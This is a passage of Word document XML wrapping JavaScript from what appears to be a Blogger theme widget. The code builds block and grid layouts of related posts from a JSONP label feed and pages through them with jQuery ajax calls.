    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c + '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                      case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                      case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;&lt;/div&gt;&lt;!--/div--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END BLOCK WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "grid-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 first"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12 col-xl-6"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END GRID WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//switch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              }//for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.closest('.melesa-plugin').find('.melesa-relative').html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }//if feed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    });//mlsa left click</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    //next ajax loading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    $(this).find('.mlsa-right').click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var $nav = $(this).closest('.melesa-nav');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var lev = $nav.attr('data-level');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var tps = $nav.attr('data-total');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var cnt = $nav.attr('data-count');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var sti = $nav.attr('data-start');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var lbl = $nav.attr('data-label');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var clev = $nav.attr('data-clevel');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      clev = Number(clev);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var type = $nav.attr('data-type');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var $tn = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      var ustart = Number(sti) + Number(cnt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //console.log(ustart);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if(clev &lt; lev){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //show loading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $(this).closest('.melesa-plugin').find('.melesa-loading').fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          url : "/feeds/posts/default/-/" + lbl + "?alt=json-in-script&amp;max-results=5&amp;start-index="+ ustart,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          success: function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //console.log(JSON.stringify(e));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(clev &gt;= 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $nav.find('.mlsa-left').removeClass('disable');</w:t>
      </w:r>
